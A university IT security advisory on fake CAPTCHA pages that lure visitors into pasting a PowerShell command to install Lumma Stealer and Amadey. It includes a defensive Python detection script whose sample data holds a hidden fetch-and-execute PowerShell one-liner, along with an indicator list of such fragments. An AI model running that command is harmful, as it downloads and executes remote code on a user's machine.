Fake CAPTCHA initiates malware

Summary

Threat actors are distributing malware through fake CAPTCHA tests (security challenges that distinguish humans from bots, for example by having the visitor select the correct objects in an image). The threat actor tricks website visitors into executing malicious code on their own device by following the instructions shown in the CAPTCHA. This code downloads and executes malware from a malicious site. The fake CAPTCHA has been found to deliver the Lumma stealer and Amadey Trojan, which can steal passwords, cookies, and cryptocurrency wallet details from a user’s device.

Description

The malware is distributed through fake CAPTCHAs with instructions. Clicking the “I’m not a robot” button copies a PowerShell script to the clipboard and displays so-called “verification steps” that include:

  • Press Win + R (this opens the Run dialog box);
  • Press CTRL + V (this pastes the line from the clipboard into the text field);
  • Press Enter (this executes the code).

The PowerShell script will retrieve a Windows EXE for malware such as the Lumma Stealer and Amadey Trojan.
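As an added example (not part of this advisory), the following Python script shows how a defender could flag the pattern described above in process-creation telemetry: a script interpreter started by explorer.exe, which is the parent of anything launched from the Run dialog, with a command line that carries download-and-execute indicators. The event format, the sample events and the indicator list are constructed for this example and are not a real Sysmon or Windows Security log format.

```python
import re

# Constructed process-creation events in a simplified key=value form
# (not real Sysmon or Security 4688 output), built for this example.
SAMPLE_EVENTS = [
    'ts=2024-11-01T10:02:11 image=C:\\Windows\\explorer.exe parent=C:\\Windows\\System32\\userinit.exe cmd="explorer.exe"',
    'ts=2024-11-01T10:02:40 image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe parent=C:\\Windows\\explorer.exe cmd="powershell -w hidden -c iwr http://example.invalid/v | iex"',
    'ts=2024-11-01T10:05:03 image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe parent=C:\\Windows\\explorer.exe cmd="powershell -File C:\\scripts\\backup.ps1"',
    'ts=2024-11-01T10:07:19 image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe parent=C:\\Windows\\System32\\cmd.exe cmd="powershell -c iwr http://example.invalid/inventory.csv -OutFile c:\\temp\\inv.csv"',
]

# Command-line fragments typical of a download-and-execute one-liner.
INDICATORS = ("invoke-webrequest", "iwr ", "downloadstring", "invoke-expression",
              "iex", "-w hidden", "-windowstyle hidden", "-enc", "http://", "https://")

# Interpreters a victim could realistically be told to paste into the Run dialog.
INTERPRETERS = ("powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe")

_FIELD = re.compile(r'(\w+)=("[^"]*"|\S+)')


def parse_event(line):
    """Parse one key=value event line into a dict, stripping surrounding quotes."""
    return {k: v.strip('"') for k, v in _FIELD.findall(line)}


def is_clickfix_like(event):
    """True when an interpreter is started by explorer.exe (the parent of a
    Run-dialog launch) with a command line carrying download-and-execute cues."""
    image = event.get("image", "").lower().rsplit("\\", 1)[-1]
    parent = event.get("parent", "").lower().rsplit("\\", 1)[-1]
    cmd = event.get("cmd", "").lower()
    if image not in INTERPRETERS or parent != "explorer.exe":
        return False
    hits = [i for i in INDICATORS if i in cmd]
    # Two or more indicators: a plain "-File script.ps1" run from the Run box
    # (event 3) stays quiet, while the pasted fetch-and-run line (event 2) fires.
    return len(hits) >= 2


def scan_events(lines):
    """Return the timestamps of events that match the fake-CAPTCHA launch pattern."""
    return [parse_event(l)["ts"] for l in lines if is_clickfix_like(parse_event(l))]


if __name__ == "__main__":
    for ts in scan_events(SAMPLE_EVENTS):
        print("suspicious Run-dialog launch at", ts)
```

On a suspect machine, the Run dialog also keeps a history of pasted commands under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, which is worth reviewing alongside the process telemetry.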

Threats

Lumma stealer and Amadey Trojan malware can steal passwords, cookies, and cryptocurrency wallet details from a user’s PC.

Technical Details

This attack spreads through malicious content injected into compromised websites (as appears to be the case with the Michigan Chronicle website), through ads accepted by the targeted site, or through contributed content hosted on the site.

Detection

Example

The fake CAPTCHA has been found on the Michigan Chronicle site. It can appear on any ordinary website, through ads accepted by the site or through other compromised content. When interacting with this compromised content, you may see the following:

Information for Users

To protect yourself from Lumma Stealer and other malware threats, be cautious of suspicious CAPTCHA pages. If you encounter a CAPTCHA page that seems out of place or unusual, it is best to avoid interacting with it.

Remember:

  • Legitimate CAPTCHA pages are usually found on websites that require user verification, such as login or account creation pages.
  • Be cautious of CAPTCHA pages that appear on unexpected websites or in applications.
  • Always check the website's URL to ensure it is legitimate.
  • Keep your software and operating system up to date to patch vulnerabilities that could be exploited by malware.

If you visit a site where you are presented with the fake CAPTCHA:

  • Take a screenshot of the CAPTCHA and report the page you were visiting to [email protected].
  • If you got to the site by clicking a link in an email, also forward the email to [email protected].

If you fall for the scam:

Note: The following steps only need to be taken if you followed the Win + R paste-and-run CAPTCHA instructions described above. Simply visiting a site where you saw the CAPTCHA, or clicking the “Verify you're human” checkbox, will not install the malware.

  • As a precaution, change any passwords you entered when you responded to the fake CAPTCHA. To do so, use a different device that did not install the malware.
  • Is it a UM-owned device? Turn it off, report the incident, and get a loaner from your unit IT department.
  • Is it a personally-owned device? Consider the Virus Scanning & Removal service offered by ITS Tech Repair.
  • Individuals who have fallen victim to one of these scams, which resulted in loss of money, should contact the University of Michigan Police Department at 734-763-1131 or text 377911.

If you believe that your U-M computer has been infected or compromised by viruses or malware, please contact IT support: For MiWorkspace Computers, contact the ITS Service Center, and for other university-owned computers contact your unit IT department.

In general, the best protection for your devices is this: keep your software and apps up to date, do not click suspicious links in email, do not open shared documents or email attachments unless you are expecting them and trust the person who sent them, and only use secure, trusted networks. For more information, see Phishing & Scams, Secure Your Devices, and Secure Your Internet Connection on the U-M Safe Computing website.

How We Protect U-M

ITS provides CrowdStrike Falcon to units, which should be installed on all U-M owned systems (Windows, macOS, and Linux operating systems, whether workstations or servers). Falcon administrators in ITS and in U-M units use the Falcon console to investigate and remediate issues.

Questions, Concerns, Reports

Please contact ITS Information Assurance through the ITS Service Center.

Sincerely,

ITS Information Assurance